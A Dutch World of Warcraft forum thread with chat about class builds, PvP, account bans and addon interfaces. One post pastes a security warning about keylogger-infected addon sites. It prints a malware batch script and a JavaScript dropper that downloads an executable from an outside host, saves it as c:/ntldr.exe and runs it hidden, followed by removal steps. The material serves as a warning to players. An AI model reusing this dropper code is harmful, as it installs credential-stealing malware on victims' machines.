Nee, shadowpriest is er alleen maar om "makkelijker" te levelen. Ik ben totnutoe 1 keer als shadow actief geweest in ZG op spiderboss om mana te drainen. En warlock met demonology ging bij ons altijd mee, Afliction ook (of hoe dat heet) In mijn guild speel je de spec die je zelf wilt, aangezien Shadow priest niet echt een "spec" is en je nogsteeds kan healen wordt dat ook van je verwacht.
Warlock zal ondanks welke spec meer dmg doen, als ik geweten had wat ik nu weet had ik mage/lock/warrior gegaan.

En ja 100% eens silence shot, "mana drain shot", dat "stun" gedoe dat je in rondjes blijft lopen, en dan nog die mega irritante pet.
hmmjah ik ben nog nooit in naxx geweest, maar toen die net uit was zei iedereen, dat warlocks niet meer nodig waren :) vandaar datik dat even mee deel.
ik ben zelf van mening dat 1 shadowpriest best nuttig kan zijn, maar ik heb geen idee hoelang het duurt voordat een shadowpriest oom raakt.
mijn (shadow) priest is op dit moment lvl 51, en met de nieuwe talents zijn er ook wat mana reduction talents, en ook de vampiric touch is best nice, helemaal als die in de healers group zit dunkt mij :)

precies over die hunters, mana sting op mijn mage is al erg genoeg.

iRacing Profiel

Acties:
  • 0 Henk 'm!

• ImdaMned
prutser001 schreef op woensdag 20 december 2006 @ 16:02:
[...]

Ik was bij maexxna anders ERG blij dat er een shadow priest in m'n party zit, die heals extra zijn ERG fijn, scheelt je bandages / pots gebruiken en kan je gewoon doornuken op die rotte spin. En het is ook extra healing als je in een cocon zit.

shadowpriests: GOED SPUL !

Acties:
  • 0 Henk 'm!

• prutser001

prutser001

Gohan-san schreef op woensdag 20 december 2006 @ 16:19:
[...]

hmmjah ik ben nog nooit in naxx geweest, maar toen die net uit was zei iedereen, dat warlocks niet meer nodig waren :) vandaar datik dat even mee deel.
ik ben zelf van mening dat 1 shadowpriest best nuttig kan zijn, maar ik heb geen idee hoelang het duurt voordat een shadowpriest oom raakt.
mijn (shadow) priest is op dit moment lvl 51, en met de nieuwe talents zijn er ook wat mana reduction talents, en ook de vampiric touch is best nice, helemaal als die in de healers group zit dunkt mij :)

precies over die hunters, mana sting op mijn mage is al erg genoeg.
Mijn "shadow priest" was al ff lvl 60, maar vampiric touvh is niet zo geweldig, als je alle dots + mindflay gebruikt kun je het wel ff uithouden als je het goed doet zeker kwartier full casten + pots :)
Als je VE/VT tegelijk doet is het zeker nuttig, alleen niet iedereen ziet dat in.

tijdje gelee volledige shadowpriest party gehad voor UBRS, heerlijk gewoon allemaal VE erop, iedereen mindflay, shield niet dood te krijgen. Alleen bij drakki 2 dooie :P 20 x fear werkt goed, tis alleen ff proberen. we hebben run zo'n 22 keer gedaan in een week uiteindelijk liepen we met de vinger in de neus rondt *GAAP* wat makkelijk. Aggro? fade :) maarja dit was voor 2.01 patch misschien dat we allemaal nog een keertje respeccen naar shadow en kijken hoe het nu gaat.

Acties:
  • 0 Henk 'm!

• Kees
  • Laatst online: 12:28

Kees

Serveradmin / BOFH / DoC
prutser001 schreef op woensdag 20 december 2006 @ 16:13:
Dus als je heel erg actief sinds lvl 19 bent in BG's en je net lvl 60 haalt, rank 11 bent, met je "bloodlord/general" gear wat pis is vergeleken met tier2/2.5/3 ? dan heeft je "rank?/honor" niets te zeggen want dan ben je gewoon de sjaak.
Marshal/warlord gear is zo te halen, en tier 2.5 is net beter dan dat, en tier-3 is alleen voor enkele classes beter voor pvp
Als ik voor 'damage' pvp ga draag ik 0 stukken t3, als ik voor healing ga wel uiteraard.
Maar als je voor healing in je marshal/warlord gaat kom je niet heel erg ver. ter info, mijn flash of light healed met healing gear aan voor 1000-1150 (afhankelijk van BoL op de target) en crit voor 1.5 keer dat (hoogste crit met trinkets op FoL staat bij mij op 2750, full raidbuffed, 1880 +healing (door trinkets). Als ik mijn 'damage' pvp spec/gear aanheb kom ik op 400-500. Bovendien ben ik in mijn healing spec vrijwel immuun tegen rogues/warriors (ashkandi warrior deed 150 mortal strikes tegen mij, crits voor 300, lang leve 12.5k armor ;))
Maar in de arena kun je gewoon goede gear halen, en als je skilled bent als team kun je best hoog komen en veel punten pakken.
Team zal wel uit healer + dps moeten bestaan, en als healer neem je het liefste een paladin mee natuurlijk :P

pala - lock teams zullen heel erg hoog eindigen op de ladders denk ik.

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

Acties:
  • 0 Henk 'm!

• On_E
  • Laatst online: 14-09 12:40

On_E

Housemusic

Kees schreef op woensdag 20 december 2006 @ 16:27:
[...]
pala - lock teams zullen heel erg hoog eindigen op de ladders denk ik.
Pala - MS Warrior teams > all

denk ik dan.

Mijn muziek : http://soundcloud.com/nyx_1978

Acties:
  • 0 Henk 'm!

• Valkyre

Valkyre

Kitesurf FTW!

hmmjah over die arena's ik denk dat iedereen zijn eigen classes het beste vind :)

ikzelf ga samen met een vriend van mij de arena in. skype erbij.
shamen + mage, denk ook best een leuke combo.

iRacing Profiel

Acties:
  • 0 Henk 'm!

• Muthas
  • Registratie: December 2005
  • Niet online

Muthas

O+

Gohan-san schreef op woensdag 20 december 2006 @ 16:49:
hmmjah over die arena's ik denk dat iedereen zijn eigen classes het beste vind :)

ikzelf ga samen met een vriend van mij de arena in. skype erbij.
shamen + mage, denk ook best een leuke combo.
Zo kunnen we doorgaan :+

Bij mij werkte shadowpriest/lock ook aardig :)

Acties:
  • 0 Henk 'm!

• Exitium
  • Laatst online: 22-08 10:49
Verwijderd schreef op woensdag 20 december 2006 @ 12:29:
[...]

Hahah wat een verhaal, zie het zo voor me _/-\o_ :D

maar ik heb zelf ook altijd pvp aan en idd het is wat je zegt, meestal gebeurt er nix en als het wel gebeurt vallen ze je gewoon opeens aan maar dan wel als je gewoon full health hebt :) enkele uitzonderingen daargelaten
Klopt, zeker mensen van de betere PvE guilds. Die houden het wat dat betreft altijd wel fair. Mensen die zonder na te denken aanvallen als ze iemand zien met PvP aan zijn meestal mensen van de wat mindere guilds. Leuke is dat die rogue en priest me aanvielen tijdens dat halloween gebeuren en ik dus als een gnome rondliep ipv met m'n normale gear zichtbaar. Was een nare verrassing voor ze. ^^
Verwijderd schreef op woensdag 20 december 2006 @ 14:24:
[...]

Helemaal mee eens. :)

Gister op Turalyon met een premade alliance team (voornamelijk van <Resisted>) een uurtje AB gedaan, tegen PuG horde teams duurden de potjes zo'n 7 minuten. Tegen de ene premade horde was het leuker, maar die wonnen we ook na 20 minuten. :)
Lol, hoorde van Shan al dat 't erg lekker ging gisteren ja. :P Moet nog 10.5 lvl met m'n lock, hoop rond de jaarwisseling de 60 te halen, daarna kom ik waarschijnlijk ook wat PvP farmen op m'n pala. (gief chest plx, en misschien boots/gloves omdat die bonusjes erg leuk zijn :P)

Acties:
  • 0 Henk 'm!

Verwijderd

Wat me nou toch weer is overkomen,
dit is echt van de zotte,
Ik kom vandaag om half 6 thuis van school, en mijn account is gebanned? :'( :(

Ik log in op wow-europe.com/account en ik kijk en daar zie ik dat mijn account temporarely suspended is.Nu staat er dan ook bij van kijk in je mail voor verdere informatie. Dit is gewoon het mail adres dat ik altijd gebruik en ik heb dus echt niks ontvangen van ze :'(
Ik heb al een mail gestuurd van waarom ben ik gebanned? Nog geen reactie tot dusver, en die telefooncentrale zit uiteraard weer vol. Dus er zullen wel meer mensen gebanned zijn? :?

Ik gebruik geen mods, behalve titan panel. En dit heb ik dus al zo lang he dat dit het echt niet kan zijn.
Ik word hier echt gigantisch gek van onderhand. Echt een kut support hebben ze daar zeg, ik ben lkkr met de billing support aan het bellen. Maar ook dit is niet normaal zeg. Zit het weer vol, of anders word je in de wacht gezet, zou dan 6 minuten duren, en dan 23 minuten later nog steeds dat rot geluidje. NU is het kwart voor 8 en zouden ze er nog moeten zijn, krijg ik een bandje van hun dat hun tijden tot 8 pm zijn etc. Maar word gewoon gedisconnect, er is dus niemand meer.

echt een klote service, als ik geen reactie krijg op mijn e-mail van vandaag, en ook niet geholpen word bij de customer support met evt een uitleg over hoe of wat en waarom ik gebanned ben, dan is het over en uit met WoW. Jammer dan, maar de support zuigt echt hard daar. Echt een slecht ongeregeld zootje daar.

Ik wil niet spammen of WoW zelf afkraken, want heb het met alle plezier gespeeld, maar dit kan echt neit door de beugel zo. BELACHELIJK!

Acties:
  • 0 Henk 'm!

• Phydomir

Phydomir

Dennis

Weet iemand of je tegenwoordig nog exp. kan krijgen in BG's?

Acties:
  • 0 Henk 'm!

• Taenadar
  • Registratie: Januari 2004
  • Nu online
Verwijderd schreef op woensdag 20 december 2006 @ 19:56:
Wat me nou toch weer is overkomen,
dit is echt van de zotte,
Ik kom vandaag om half 6 thuis van school, en mijn account is gebanned? :'( :(
Hoe betaal je je WoW ? En hoe oud ben je ? Een vriend van me heeft dit ook. Hij heeft gebelt en hij kreeg te horen dat je 18 moet zijn om van de bank af te schrijven en de bank dit weigerde. Nu kan hij zijn account weer activeren met een Credit Card maar die heeft hij dus niet.

Acties:
  • 0 Henk 'm!

Verwijderd

Eergister beaststalker gloves gekocht op de ah voor 2 gold 75 buyout. En gister heb ik ze verkocht voor 100gold

En ik heb een vraag over hunter.
1 agility is 1 attack power?

En je eigen attack power, geldt dat ook voor je pet? (zoiets had ik gehoord) ?

Acties:
  • 0 Henk 'm!

Verwijderd

Exitium schreef op woensdag 20 december 2006 @ 19:38:
[...]

Klopt, zeker mensen van de betere PvE guilds. Die houden het wat dat betreft altijd wel fair. Mensen die zonder na te denken aanvallen als ze iemand zien met PvP aan zijn meestal mensen van de wat mindere guilds. Leuke is dat die rogue en priest me aanvielen tijdens dat halloween gebeuren en ik dus als een gnome rondliep ipv met m'n normale gear zichtbaar. Was een nare verrassing voor ze. ^^
:')

Das helemaal grappig. Echt wat zullen ze zuur zijn geweest :D

Acties:
  • 0 Henk 'm!

Verwijderd

Taenadar schreef op woensdag 20 december 2006 @ 21:58:
[...]

Hoe betaal je je WoW ? En hoe oud ben je ? Een vriend van me heeft dit ook. Hij heeft gebelt en hij kreeg te horen dat je 18 moet zijn om van de bank af te schrijven en de bank dit weigerde. Nu kan hij zijn account weer activeren met een Credit Card maar die heeft hij dus niet.
IK ben 19, en betaal via direct debit(postbank) ofwel automatische incasso, en had nog tot 8 januari staan van dat ik kon spelen... Ik heb btw ook geen credit card.
Erg slechte zaak dit van blizzard :?

Acties:
  • 0 Henk 'm!

• Exitium
Verwijderd schreef op woensdag 20 december 2006 @ 23:14:
[...]

:')

Das helemaal grappig. Echt wat zullen ze zuur zijn geweest :D
Hehe, toen ik dood was verloor ik m'n outfit natuurlijk, rogue wist niet hoe snel 'ie weg moest komen toen 'ie me aan zag komen. Denk dat ik ze daarom ook niet meer gezien heb.

Net op de 19e dag 50 gedinged, heb in 19 dagen 31 lvls gedaan, niet slecht dacht ik zo. :P Ga proberen om nog dit jaar de 60 te halen. Af en toe een instance questrun (alles in Ulda in één keer, alles in ZF in twee keer, etc, <3 60 vrienden) en verder veel questen en wat grinden. Binnenkort even richting ST voor m'n lock quest enzo, valt genoeg te doen vanaf nu qua zones en quests. ^^

• TepelStreeltje
  • Laatst online: 12:47

TepelStreeltje

Fairytale gone bad...

Verwijderd schreef op woensdag 20 december 2006 @ 23:24:
[...]

IK ben 19, en betaal via direct debit(postbank) ofwel automatische incasso, en had nog tot 8 januari staan van dat ik kon spelen... Ik heb btw ook geen credit card.
Erg slechte zaak dit van blizzard :?
is meer gezeik mee, je kan beste gewoon gametime cards kopen, heb je geen gezeik met direct debit.
Bij ons ind e guild ook al mannetje of 3 die er ruzie mee hadden.
ze kunnen nu btw nooit meer met direct debet betalen bij blizz (je bent wss 1 keer te laat geweest ofzo (onbedoelt) en daarom nu voor altijd de lul)

creditcat is toch fijnste imo, kost je 12 euro per jaar, maar nergens last van, alle betalingen gaan goed.

Battle.net Spud#2543

Verwijderd

TepelStreeltje schreef op donderdag 21 december 2006 @ 00:42:
[...]

is meer gezeik mee, je kan beste gewoon gametime cards kopen, heb je geen gezeik met direct debit.
ze kunnen nu btw nooit meer met direct debet betalen bij blizz (je bent wss 1 keer te laat geweest ofzo (onbedoelt) en daarom nu voor altijd de lul)
same, dat heb ik ook. had er 1 keer te weinig geld op staan.

• junglebeast
  • Registratie: Augustus 2005
  • Laatst online: 10-09 18:14

junglebeast

hier staat iets

TepelStreeltje schreef op donderdag 21 december 2006 @ 00:42:
[...]

creditcat is toch fijnste imo, kost je 12 euro per jaar, maar nergens last van, alle betalingen gaan goed.
Meer games doen hier moeilijk mee, had ik ook met EQ. Ben nu nog steeds gebanned, en kan niks veranderen das het klote eraan. Nee ik straks over op gamecards.

B.NET: Junglebeast#2495 | Stormscale Horde

• JeroenNietDoen
  • Registratie: Januari 2001
  • Laatst online: 05:34
ImdaMned schreef op woensdag 20 december 2006 @ 16:21:
[...]

Ik was bij maexxna anders ERG blij dat er een shadow priest in m'n party zit, die heals extra zijn ERG fijn, scheelt je bandages / pots gebruiken en kan je gewoon doornuken op die rotte spin. En het is ook extra healing als je in een cocon zit.

shadowpriests: GOED SPUL !
/eens

Toen we in Exomna Twisted meenamen en die in een warlock group zette was ik echt verbaasd. Normaal als ik ga tappen dan hopen dat een healer dat oppakt maar met shadowpriest gewoon tappen, wordt toch wel gehealed.

Nee, wat mij betreft mogen er wel meer shadowpriests mee / raid.

• Bokkie
  • Niet online
beetje laat maar in het kader van show je ui

http://www.loslocos.tweakdsl.nl/images/ui201.jpg

geen thumb dus enkel een linkje, kleine aanpassing weer gedaan inmiddels, de debuffs op target en target's target zijn kleiner gemaakt en de frames iets hoger zodat ze niet over me buttons heen komen
meeste is Ace based

* Fubar + plugins voor van alles en nogwat
* bigwigs
* AG Unitframes
* Bartender3
* CTraid
* oCB
* simplecombatlog
* skinner
* Clearfont
* Elkbuffbar
* Itemrack
* oRoguehelper
* SCT(D)

en ben er vast nog wel wat vergeten :P

• CV_SmileY
  • Registratie: Februari 2001
  • Laatst online: 10-09 12:50

CV_SmileY

JackOfAllTrades MasterOfNone

nice talk in /g ;)

maaruh, voor de rest nette interface

• Bokkie
  • Niet online
yeah no shit, niveau in /g is hoog bij ons :P gelukkig kan je /o niet zien >_<

• thewizard2006
ik heb pas titanpanel geinstalleerd (uiteraard de nieuwste) en daar wat mee lopen kloten. Op een gegeven moment kreeg ik errors als ik iets wilde toevoegen (time, bags etc) en nu zie ik alleen nog maar 2 grijze balken boven en onderin. Als je op de settings van TP kijkt zie je gewoon dat alles aanstaat maar je ziet niets. Als ik wat probeer uit te zetten (of aan) krijg ik een errormssg dat hij iets nodig heeft van TP. Als ik bijv bags aanklikt geeft hij een errormssg dat hij time nodig heeft etc. Net of alles afhankelijk is van elkaar.
Heb al alle mapjes van TP weggegooid uit mijn addon map en weer teruggezet met een nieuwe download maar krijg precies hetzelfde. Iemand hier ervaring mee.
Heb ook OmniCC en Atlas en die werken goed.

Verwijderd

Ik heb zonet humar the pridelord als pet.
Maar hoe krijg je precies punten om je pet skills te leren?

door gewoon level up te halen met je pet?

-edit-

Thewizard... heb je al geprobeerd je WTF te verwijderen?
Maar als ik jou was zou ik wel een backup van je WTF map maken. (daar staan alle instellingen in)

[ Voor 36% gewijzigd door Verwijderd op 21-12-2006 07:39 ]

• thewizard2006
ik denk niet dat ik wtf heb geprobeerd te verwijderen. Weet nog niet de hele mappenstructuur uit me hoofd :P
als ik thuis ben (zucht over 8 uur ofzow) dan zal ik het is proberen
nog meer suggesties??? of ervaring

Verwijderd

de WTF map verwijderen moet zoiezo wel werken.
Daar worden namelijk alle instellingen opgeslagen ;)

In de map interface/addons wordt niks opgeslagen.
Daar staan alleen de addons.

• thewizard2006
maar in die map staan dat alle instelling ook van bijv resolutie, grafische zooi etc? + de add ons die er bij staan.
En dan moet ik dit weer opnieuw instellen en dan zou het weer goed zijn. Ik bedoel dus dat ik niet het hele spel omzeep help als ik deze gegevens in de map wtf (leuk naam btw) weggooi.

Verwijderd

In de WTF map heb je een bestandje Config.wtf

Daar staan alle instellingen kwa video enz in.
(open het maar eens met text)

En als je vanmiddag thuis bent dan zou ik gewoon ff in de map wtf kijken ...
Het is gewoon een beetje prusten.

En je helpt echt niks om zeep...
Maar voor de zekerheid zou ik de map wtf wel ff kopieren (voor als backup)

-edit-

En je kan ook proberen om naar titan dingen in de wtf map te zoeken, en die vervolgens te verwijderen.

Als je een backup hebt is er niks aan de hand ;)

[ Voor 21% gewijzigd door Verwijderd op 21-12-2006 08:01 ]

• thewizard2006
owk heel erg bedankt je hoort het nog.

hier ook gelijk ff een update van mijn char :D ben nu L37
dus bijna level 40. En dat betekend een paardje. Nu heb ik rond de 50gold en heb ik geloof ik rond de 100 nodig (riding skills en mount) Nu wilde ik graag 3 dingen weten:
1. waar kan ik die riding skills trainen of kopen?
2. waar kan ik als human mage een paard kopen (een btje een mooie) of iets anders wat rijdt :P
3. wat is op dit moment (level 37/38) een mooi gebied/goede mobs om goud te grinden zodat ik op l40 dalijk genoeg heb???
Dit is nu mijn tree (fire) http://www.worldofwarcraf...0000000000000000000000000

en moet denk ik worden
http://www.worldofwarcraf...2510030000000000000000000

tips zijn altijd welkom
ben nu aant levelen en questen in strangletorn en arathi dus als iemand zin heeft om te helpen (heb nogal wat oranje en rode (elite) quests.Ik speel op Emeriss PvP

[ Voor 8% gewijzigd door thewizard2006 op 21-12-2006 08:17 ]

• JeroenNietDoen
  • Registratie: Januari 2001
  • Laatst online: 05:34
Fijn! ui.worldofwar.net beschikt weer over een nieuwe keylogger :/

• Bokkie
  • Niet online
Kaap schreef op donderdag 21 december 2006 @ 08:25:
Fijn! ui.worldofwar.net beschikt weer over een nieuwe keylogger :/
curse ook schijnt het

meer info op http://www.worldofraids.com/

• Phydomir

Phydomir

Dennis

Bokkie schreef op donderdag 21 december 2006 @ 07:18:
beetje laat maar in het kader van show je ui

http://www.loslocos.tweakdsl.nl/images/ui201.jpg

geen thumb dus enkel een linkje, kleine aanpassing weer gedaan inmiddels, de debuffs op target en target's target zijn kleiner gemaakt en de frames iets hoger zodat ze niet over me buttons heen komen
meeste is Ace based

* Fubar + plugins voor van alles en nogwat
* bigwigs
* AG Unitframes
* Bartender3
* CTraid
* oCB
* simplecombatlog
* skinner
* Clearfont
* Elkbuffbar
* Itemrack
* oRoguehelper
* SCT(D)

en ben er vast nog wel wat vergeten :P
Nice hoor.

Denk dat ik zelf ook maar die chat vensters zo ga doen. Ziet er wel fraai uit.
Lol.. net nog wat gedownload op ui.worldofwar.net. Maar geen keylogger gelukkig. Ik heb ook mijn account naam altijd aan staan en voer alleen mijn password in. Zo kunnen ze toch nooit aan mijn combinatie van username/wachtwoord komen?

[ Voor 21% gewijzigd door Phydomir op 21-12-2006 08:47 ]

• thalantis
  • Registratie: Augustus 1999
  • Laatst online: 26-01-2023

thalantis

12200 Wp

Lol.. net nog wat gedownload op ui.worldofwar.net. Maar geen keylogger gelukkig. Ik heb ook mijn account naam altijd aan staan en voer alleen mijn password in. Zo kunnen ze toch nooit aan mijn combinatie van username/wachtwoord komen?
helaas maar een account van mij is gehackt door de vorige keylogger en daar stond de naam onthouden ook aan

Jsunnyreports

Verwijderd

Account Security Warning: Addon Websites infected with keyloggers

Numerous threads have been popping up over the last couple of days about keyloggers embeded in Add-ons on Curse-gaming.com and worldofwar.net., lots of players got their account stolen. They have been detected in Addons and other parts of those two websites, according to users's testimony on boards.

For players who dont know, what's a keylogger and how dangerous it is for your WoW account, I will do a quick decription:
• Keyloggers record what you fill in at your account name and password and then send those data to the maker of the script. Therefore you will lose your account, since somebody else know your account and password information.

How to check if you are infected:

• If you have a file named ntldr.exe (EXE, not dll, the dll is used by your OS to boot your computer). That file is the keylogger and you should remove it asap.
• If you have the file \Windows\System32\algetgleyus.exe DELETE IT! Then open regedit.exe and go to \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and DELETE the key systwyei (this is what starts the executable each time). ONLY REMOVE THOSE TWO ITEMS.

How to protect yourself:

• Dont use Internet Explorer (It hasnt been confirmed that IE 7.0 was safe yet), instead download and start using Mozilla Firefox.
*Fore more security, since WoW targeted keyloggers use java in their process to infect you, you can block or allow java-script with the no-script add-on for firefox, It disables java on default and let you enable it on choice (for trusted websites).*

Where:

WorldofWar.net: At this time, there is a keylogger embedded into the ui.worldofwar.net homepage. The keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe (do not visit!).

Curse-gaming.com: The curse-gaming keylogger is on media1.curse-gaming.com. If you go to their beta patch notes page from their site, everything's clean, but if you go to the one listed above, it's got the keylogger on it. (Source)

Source, testimony and more detailed infos:

• WorldofRaids: http://www.worldofraids.com/forum/viewtopic.php?t=2487
• Blizzard forums: http://forums.worldofwarc...ml?topicId=58796664&sid=1
• IGN: http://vnboards.ign.com/w...s/b22782/100532144/p1/?13

(copypaste van www.worldofraids.com)

-edit-
Meer info (van worldofraids.com forums):

Some new info:
The curse-gaming keylogger isn't *EXACTLY* on curse-gaming.com, it's on media1.curse-gaming.com. If you go to their beta patch notes page from their site, everything's clean, but if you go to the one listed above, it's got the keylogger on it.

the curse-gaming .exe contains this (Courtesy of Borong from Final Ascension):
boy this was a project.. so 47-22782-ollydbg-ollydbg.exe was written in simple Chinese which when executed does 3 things:

1. unpacks some files to a temp dir
2. creates a VB script
3. runs the VB script

Here's the vbscript:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
@Echo Off¡¡¡¡
Set date=%date%   
date 1987-12-18   
@Echo Off & setlocal enableextensions
Echo WScript.Sleep 1000 > WOWLog.vbs
Set /a i = 10   
:Timeout
If %i% == 0 Goto Next
setlocal
Set /a i = %i% - 1
cscript //nologo WOWLog.vbs   
Goto Timeout
Goto End
:Next
Interfaces.exe   
date %date%
Del Interfaces.exe
Del Setup_interfacer.exe
Del WOWLog.vbs
Del Setup.exe

So the interfaces.exe file seems to be the one that setups a resident file that loves to load itself into your systems memory. The process I believe is called algetgleyus.exe but no file by that name exists on disk. So thats pretty much where I am at now. All in all a fun little exercise for me doing some stuff I haven't done in awhile.

Edit 1: Oh yeah and the setup_~1.exe file created by ollydbg was written in Russian.. so yeah Chinese and Russian two languages I am really proficient in when trying to disassemble code and figure it out.

Edit 2: Doh.. I am a moron! algetgleyus.exe lives in \Windows\System32 and by default is a hidden, read-only file.

Edit 3: HOW TO CHECK IF YOU ARE INFECTED!!!!

If you have the file \Windows\System32\algetgleyus.exe DELETE IT!

Open regedit.exe and go to \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and DELETE the key systwyei (this is what starts the executable each time)

ONLY REMOVE THOSE TWO ITEMS.

And from him about the WorldofWar one:
Borong wrote:
Ok so for the ui.wow one (file called pps.exe) here's what the script inside the embedded iframe really looks like (i didn't decode it.. found it on the forums)

code:
1
2
3
4
5
6
7
8
9
10
xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
xPost.Send();
var sGet=df.CreateObject('ADODB.Stream','');
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xPost.ResponseBody);
sGet.SaveToFile('c:/ntldr.exe',2);
var x = df.CreateObject('wscript.shell','');
x.run('c:/ntldr.exe',0);

So that one d/l's the pps.exe file, saves it to a file called "c:/ntldr.exe" which is COMPLETELY AND UTTERLY DIFFERENT than "c:\ntldr.dll" which YOU MUST HAVE TO LOAD WINDOWS!

Anyway.. I should be getting back to actual work so I can get out of here soon.

I wonder how many of you actually read this crap. Laughing

[ Voor 42% gewijzigd door Verwijderd op 21-12-2006 10:19 ]

• MantaMania
  • Registratie: November 2004
  • Laatst online: 01-05-2024

MantaMania

Pray Hard

Exitium schreef op woensdag 20 december 2006 @ 23:44:
[...]

Hehe, toen ik dood was verloor ik m'n outfit natuurlijk, rogue wist niet hoe snel 'ie weg moest komen toen 'ie me aan zag komen. Denk dat ik ze daarom ook niet meer gezien heb.
Wat ben je ook een patser he ;)
Een beetje normale rogue / priest combinatie zou echt geen enkele moeite moeten hebben met een paladin wat voor gear je ook hebt.

• Kevinp
Verwijderd schreef op donderdag 21 december 2006 @ 09:24:
Account Security Warning: Addon Websites infected with keyloggers

Numerous threads have been popping up over the last couple of days about keyloggers embeded in Add-ons on Curse-gaming.com and worldofwar.net., lots of players got their account stolen. They have been detected in Addons and other parts of those two websites, according to users's testimony on boards.

For players who dont know, what's a keylogger and how dangerous it is for your WoW account, I will do a quick decription:
• Keyloggers record what you fill in at your account name and password and then send those data to the maker of the script. Therefore you will lose your account, since somebody else know your account and password information.

How to check if you are infected:

• If you have a file named ntldr.exe (EXE, not dll, the dll is used by your OS to boot your computer). That file is the keylogger and you should remove it asap.

How to protect yourself:

• Dont use Internet Explorer (It hasnt been confirmed that IE 7.0 was safe yet), instead download and start using Mozilla Firefox.
*Fore more security, since WoW targeted keyloggers use java in their process to infect you, you can block or allow java-script with the no-script add-on for firefox, It disables java on default and let you enable it on choice (for trusted websites).*

Where:

WorldofWar.net: At this time, there is a keylogger embedded into the ui.worldofwar.net homepage. The keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe (do not visit!).

Curse-gaming.com: The curse-gaming keylogger is on media1.curse-gaming.com. If you go to their beta patch notes page from their site, everything's clean, but if you go to the one listed above, it's got the keylogger on it. (Source)

Source, testimony and more detailed infos:

• WorldofRaids: http://www.worldofraids.com/forum/viewtopic.php?t=2487
• Blizzard forums: http://forums.worldofwarc...ml?topicId=58796664&sid=1
• IGN: http://vnboards.ign.com/w...s/b22782/100532144/p1/?13

(copypaste van www.worldofraids.com)
_/-\o_ _/-\o_

heb ff onze guildies gewaarschuwd. Zal nu eens (veilig op mijn werk) kijken of curse gaming d'r melding van maakt.

• thewizard2006
staan er dan keyloggers op die website zelf????
of is dat bij sommige add ons die je download
want als hij op de website zelf staat, betekend dit dat de makers van worldofwar.net nogal dom bezig zijn......
dus wat kan ik wel/niet doen
ben net namelijk verschillende add ons aant downloaden

Verwijderd

In de reacties op worldofraids staat al iemand die uit naam van Curse zegt dat Curse al weer clean is. Of dat ook echt zo is kan ik natuurlijk niet verifiëren. :P

Verwijderd

junglebeast schreef op donderdag 21 december 2006 @ 04:28:
[...]

Meer games doen hier moeilijk mee, had ik ook met EQ. Ben nu nog steeds gebanned, en kan niks veranderen das het klote eraan. Nee ik straks over op gamecards.
maar dat is het hem nou juist. Ik ben nog nooit te laat geweest, het zou eigenlijk ook pas 8 januari weer afgeschreven moeten worden, want ik had nog tot die tijd speeltijd :'(
Maar wat ik veel erger vind is dat ik niet eens een mail heb ontvangen over hoe of wat.. Erg irritant dit. Zou vanmiddag vakantie krijgen, en dan in de vakantie men tauren warr ff over de 40 gooien, wss zelfs 45 wel. hijs nu 31..
Ik ga dalijk maar weer bellen, hopelijk zitten er dan meer mensen op school e.d. zodat ik tenminste iemand te hoor krijg.

Bedankt voor de hulp iig jullie :)

Verwijderd

thewizard2006 schreef op donderdag 21 december 2006 @ 09:53:
staan er dan keyloggers op die website zelf????
of is dat bij sommige add ons die je download
want als hij op de website zelf staat, betekend dit dat de makers van worldofwar.net nogal dom bezig zijn......
dus wat kan ik wel/niet doen
ben net namelijk verschillende add ons aant downloaden
Op de website zelf. Dus zodra je één van die sites vandaag of gisteren bezocht hebt is de kans groot dat je slachtoffer bent en zou ik WoW niet opstarten voor je zeker bent dat je de keylogger niet hebt, en voor de zekerheid even je wachtwoord veranderen op de site. Al weet ik weer niet zeker of dat wel veilig is... :/

[ Voor 8% gewijzigd door Verwijderd op 21-12-2006 09:56 ]

Verwijderd

Exitium schreef op woensdag 20 december 2006 @ 23:44:
[...]

Net op de 19e dag 50 gedinged, heb in 19 dagen 31 lvls gedaan, niet slecht dacht ik zo. :P Ga proberen om nog dit jaar de 60 te halen. Af en toe een instance questrun (alles in Ulda in één keer, alles in ZF in twee keer, etc, <3 60 vrienden) en verder veel questen en wat grinden. Binnenkort even richting ST voor m'n lock quest enzo, valt genoeg te doen vanaf nu qua zones en quests. ^^
hehehe, dan weet ie waarmee hij fucked >:)

Ik neem aan dat je "gewoon de 19e dag" bedoelt en niet 19 days played :P , dan vind ik het wel netjes. Maarja, dat zeg ik met 16 dagen played @ lvl 49 :X , maargoed, dat komt mede door het verkennen en rondlopen voor de lol, low lvl guildies helpen en pvpen. Maar ook ik wil dit jaar 60 worden zodat het netjes aansluit met TBC. Gelukkig is de zaak volgende week dicht dus dat word diehard wowen op cola/wiet >:) . Als ik je wat kan aanraden aangezien je ong hetzelfde lvl ben als mij. Blasted Lands is erg leuk, lekker pittig ook :)

• Smultie
  • Niet online
Ik zal er vast helemaal naast zitten, maar is NTLDR.exe niet gewoon een executable van Windows?

Verwijderd

SMulTiE schreef op donderdag 21 december 2006 @ 10:13:
Ik zal er vast helemaal naast zitten, maar is NTLDR.exe niet gewoon een executable van Windows?
Nee, ntldr.dll is van windows (wordt ook gemeld in mijn post) :)

• Kevinp
Ebayzo schreef op donderdag 14 december 2006 @ 15:02:
[...]
Ok. Ik weet inderdaad dat je het kan laten zien maar het stijgt dus niet meer. Dank u
Hieraan kan je straks zien zeker bij de eerste mains of iemand al lang speeld :). Dat is de enige rede dat ik hem aan heb staan.

• Smultie
  • Niet online
Verwijderd schreef op donderdag 21 december 2006 @ 10:14:
[...]

Nee, ntldr.dll is van windows (wordt ook gemeld in mijn post) :)
Ik las het, maar volgens mij klopt dat dus niet :o

Google maar eens op die filename...

[ Voor 7% gewijzigd door Smultie op 21-12-2006 10:19 ]

• Ebayzo
  • Registratie: Juli 2001
  • Laatst online: 17-10-2022

Ebayzo

hij/hem

